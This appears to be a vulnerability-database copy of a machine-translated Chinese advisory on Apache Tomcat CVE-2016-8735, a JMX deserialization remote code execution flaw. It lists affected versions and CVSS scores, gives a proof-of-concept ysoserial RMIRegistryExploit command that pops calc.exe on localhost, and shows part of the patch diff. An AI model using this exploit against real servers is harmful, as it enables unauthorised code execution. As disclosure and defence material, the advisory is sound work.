Lucene search

K
myhack58佚名MYHACK58:62201681747
HistoryDec 03, 2016 - 12:00 a.m.

Apache Tomcat multiple versions of a remote code execution CVE-2016-8735(POC)-vulnerability warning-the black bar safety net

2016-12-0300:00:00
佚名
www.myhack58.com
531

9 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.078 Low

EPSS

Percentile

93.5%

Background description
Tomcat is by Apache Software Foundation subordinate’s Jakarta a project development Servlet vessel, in accordance with Sun Microsystems to provide the technical specifications, the realization of the Servlet and JavaServer Page(JSP)support, and provides as aWeb serversome unique functions, like Tomcat managed and controls the platform, secure domain management and the Tomcat valve and so on. Tomcat is very popular with the majority of programmers like it, because it runs out system resources occupied by small, scalable, support load balancing and Mail Service, etc. the development of the application system commonly used functions.
Vulnerability description
Oracle fixes JmxRemoteLifecycleListener deserialization Vulnerability(CVE-2016-3427)。 Tomcat also uses the JmxRemoteLifecycleListener this listener,but the Tomcat did not timely upgrade, so there is this remote code execution vulnerability.
Affected version:
Apache Tomcat 9.0.0. M1 to 9.0.0. M11
Apache Tomcat 8.5.0 to 8.5.6
Apache Tomcat 8.0.0. RC1 to 8.0.38
Apache Tomcat 7.0.0 to 7.0.72
Apache Tomcat 6.0.0 to 6.0.47

The impact of the scene:
Zabbix 2.0 has been the JMX monitoring added to the system, itself, is no longer dependent on third-party tools. This is on a Tomcat application and other Java application monitoring easier. Herein, a simple description Zabbix use JMX to monitor Tomcat process.
Vulnerability verification code(POC):
Tested version: tomcat version 8. 0. 36
conf/server. xml to increase the configuration, add the catalina-jmx-remote. jar package, modify the catalina configuration file
! [](/Article/UploadPic/2016-12/2016123165437471. png? www. myhack58. com)
! [](/Article/UploadPic/2016-12/2016123165437789. png? www. myhack58. com)
F:\HackTools\EXP>java-cp ysoserial-master-v0.0.4.jar ysoserial. exploit. RMIRegistryExploit localhost 10001 Groovy1 calc.exe
! [](/Article/UploadPic/2016-12/2016123165437478. png? www. myhack58. com)
This vulnerability, there are other use posture, the harm is huge, so to change the JMX password authentication is very necessary!
Patch code:
Diff of /tomcat/trunk/webapps/docs/changelog.xml
!
Parent Directory |
!
Revision Log |
!
Patch
-– tomcat/trunk/webapps/docs/changelog.xml 2016/11/02 11:57:28 1767643
+++ tomcat/trunk/webapps/docs/changelog.xml 2016/11/02 11:57:36 1767644
@@ -97,6 +97,10 @@
StoreConfig component includes the executor name when writing the
The Connector configuration. (markt)

+
+ When configuring the JMX remote listener, specify the allowed types for
+ the credentials. (markt)
+

/tomcat/trunk/java/org/apache/catalina/mbeans/JmxRemoteLifecycleListener.java
!
Parent Directory |
!
Revision Log |
!
Patch
-– tomcat/trunk/java/org/apache/catalina/mbeans/JmxRemoteLifecycleListener.java 2016/11/02 11:57:28 1767643

[1] [2] next

9 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.078 Low

EPSS

Percentile

93.5%